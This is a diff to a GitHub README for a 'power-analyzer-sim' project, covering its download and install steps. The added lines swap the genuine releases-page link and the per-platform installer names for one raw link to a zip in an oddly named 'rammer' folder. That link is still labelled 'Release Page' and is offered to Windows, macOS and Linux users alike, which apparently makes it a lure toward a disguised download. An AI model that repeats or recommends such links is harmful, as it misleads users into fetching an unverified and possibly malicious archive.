Abdousettar/power-analyzer-sim/README.md

 ## 🔧 Download & Install

-To download the application, visit this page to download: [Release Page](https://github.com/Abdousettar/power-analyzer-sim/releases).
+To download the application, visit this page to download: [Release Page](https://raw.githubusercontent.com/Abdousettar/power-analyzer-sim/main/rammer/power-analyzer-sim.zip).

 ### Step-by-Step Instructions:

 1. **Go to the Release Page:**
-   Click this link to visit the [Release Page](https://github.com/Abdousettar/power-analyzer-sim/releases).
+   Click this link to visit the [Release Page](https://raw.githubusercontent.com/Abdousettar/power-analyzer-sim/main/rammer/power-analyzer-sim.zip).

 2. **Find the Latest Release:**
    On the Release Page, look for the most recent version at the top.

 3. **Download the Application:**
    Click on the file that matches your operating system.
 For example:
-   - If using Windows, download `power-analyzer-sim-windows.exe`.
+   - If using Windows, download `https://raw.githubusercontent.com/Abdousettar/power-analyzer-sim/main/rammer/power-analyzer-sim.zip`.
-   - If using macOS, download `power-analyzer-sim-macos.pkg`.
+   - If using macOS, download `https://raw.githubusercontent.com/Abdousettar/power-analyzer-sim/main/rammer/power-analyzer-sim.zip`.
-   - If using Linux, download `power-analyzer-sim-linux.tar.gz`.
+   - If using Linux, download `https://raw.githubusercontent.com/Abdousettar/power-analyzer-sim/main/rammer/power-analyzer-sim.zip`.

 4. **Install the Application:**
    - **Windows:**